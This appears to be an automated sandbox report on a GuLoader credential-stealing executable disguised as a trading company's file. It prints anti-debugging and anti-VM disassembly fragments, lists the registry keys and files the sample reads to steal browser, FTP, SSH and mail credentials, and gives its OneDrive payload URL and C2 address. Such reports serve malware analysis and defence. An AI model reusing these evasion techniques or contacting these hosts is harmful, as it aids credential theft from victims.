Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D1B185 second address: 0000000003D1B185 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D1A36A second address: 0000000003D1A381 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor edi, ED27E950h 0x00000011 pushad 0x00000012 mov eax, 000000C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D162DB second address: 0000000003D162DB instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D1A3AE second address: 0000000003D1A247 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001A5h], edx 0x00000010 cmp cx, ax 0x00000013 mov edx, F94DAB62h 0x00000018 xor edx, BD1A4B48h 0x0000001e xor edx, C6B15F47h 0x00000024 jmp 00007F0E0CF3DE02h 0x00000026 cmp si, 0F1Bh 0x0000002b sub edx, 82E5DE6Eh 0x00000031 cmp ah, bh 0x00000033 cmp word ptr [ebx+05h], dx 0x00000037 mov edx, dword ptr [ebp+000001A5h] 0x0000003d jne 00007F0E0CF3DDDCh 0x0000003f mov dword ptr [ebp+00000189h], ecx 0x00000045 mov ecx, CF26FC6Ch 0x0000004a xor ecx, 90037EF2h 0x00000050 test ax, dx 0x00000053 add ecx, B269DCB6h 0x00000059 cmp cl, al 0x0000005b add ecx, EE70C0ACh 0x00000061 nop 0x00000062 cmp dword ptr [ebp+00000189h], ecx 0x00000068 mov ecx, dword ptr [ebp+00000189h] 0x0000006e jne 00007F0E0CF3DA34h 0x00000074 inc ecx 0x00000075 inc ebx 0x00000076 mov dword ptr [ebp+0000017Dh], ecx 0x0000007c mov ecx, 3E44CBEFh 0x00000081 xor ecx, B436F885h 0x00000087 add ecx, 0943E9D7h 0x0000008d xor ecx, 0326DE11h 0x00000093 test bl, FFFFFFE4h 0x00000096 cmp dword ptr [ebx], ecx 0x00000098 mov ecx, dword ptr [ebp+0000017Dh] 0x0000009e jne 00007F0E0CF3DE36h 0x000000a4 mov dword ptr [ebp+00000171h], edi 0x000000aa mov edi, dword ptr [ebx] 0x000000ac cmp edx, edi 0x000000ae mov edi, dword ptr [ebp+00000171h] 0x000000b4 jne 00007F0E0CF3DDB8h 0x000000b6 mov dword ptr [ebp+0000022Eh], eax 0x000000bc test ax, cx 0x000000bf mov eax, 90506750h 0x000000c4 test bx, bx 0x000000c7 pushad 0x000000c8 lfence 0x000000cb rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D15953 second address: 0000000003D15953 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 000000000056A36A second address: 000000000056A381 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor edi, ED27E950h 0x00000011 pushad 0x00000012 mov eax, 000000C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 000000000056392D second address: 000000000056392D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp dx, bx 0x0000000d sub ecx, 45FB412Ah 0x00000013 cmp dword ptr [ebp+00000248h], ecx 0x00000019 mov ecx, dword ptr [ebp+00000248h] 0x0000001f jne 00007F0E0CA150EFh 0x00000021 mov byte ptr [eax+ecx-01h], FFFFFF9Ch 0x00000026 xor byte ptr [eax+ecx-01h], FFFFFFBEh 0x0000002b xor byte ptr [eax+ecx-01h], FFFFFFEAh 0x00000030 test ebx, eax 0x00000032 xor byte ptr [eax+ecx-01h], FFFFFFC8h 0x00000037 dec ecx 0x00000038 mov dword ptr [ebp+00000248h], ecx 0x0000003e test dl, 00000057h 0x00000041 mov ecx, B206E4FAh 0x00000046 add ecx, 638A09D6h 0x0000004c xor ecx, 506BAFFAh 0x00000052 pushad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 00000000005642E1 second address: 00000000005642E1 instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1611B rdtsc 1_2_03D1611B
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe TID: 6988 Thread sleep count: 205 > 30 Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe TID: 7032 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Thread delayed: delay time: 60000 Jump to behavior
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp, KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzgBuZcfleEwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1611B rdtsc 1_2_03D1611B
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D17601 LdrInitializeThunk, 1_2_03D17601
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D8D mov eax, dword ptr fs:[00000030h] 1_2_03D19D8D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D18769 mov eax, dword ptr fs:[00000030h] 1_2_03D18769
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D39 mov eax, dword ptr fs:[00000030h] 1_2_03D19D39
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D140DC mov eax, dword ptr fs:[00000030h] 1_2_03D140DC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D16245 mov eax, dword ptr fs:[00000030h] 1_2_03D16245
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1347D mov eax, dword ptr fs:[00000030h] 1_2_03D1347D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D18E26 mov eax, dword ptr fs:[00000030h] 1_2_03D18E26
Enables debug privileges
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe' Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 458277 Sample: KHAWATMI CO.IMPORT & EXPORT.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 19 Found malware configuration 2->19 21 Multi AV Scanner detection for submitted file 2->21 23 GuLoader behavior detected 2->23 25 6 other signatures 2->25 6 KHAWATMI CO.IMPORT & EXPORT.exe 2 2->6         started        process3 signatures4 27 Tries to detect Any.run 6->27 29 Hides threads from debuggers 6->29 9 KHAWATMI CO.IMPORT & EXPORT.exe 60 6->9         started        process5 dnsIp6 13 185.227.139.18, 49753, 49754, 49755 DIGITURUNCTR Iran (ISLAMIC Republic Of) 9->13 15 onedrive.live.com 9->15 17 2 other IPs or domains 9->17 31 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 9->31 33 Tries to steal Mail credentials (via file access) 9->33 35 Tries to harvest and steal ftp login credentials 9->35 37 3 other signatures 9->37 signatures7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.227.139.18
 unknown Iran (ISLAMIC Republic Of)
48011 DIGITURUNCTR false

Contacted Domains

Name IP Active
mbdetq.dm.files.1drv.com unknown unknown
onedrive.live.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.227.139.18/dsaicosaicasdi.php/a1NQk98eWCWX2 false
  • Avira URL Cloud: safe
 unknown
https://onedrive.live.com/download?cid=7B0580AA0B18AE false
    		high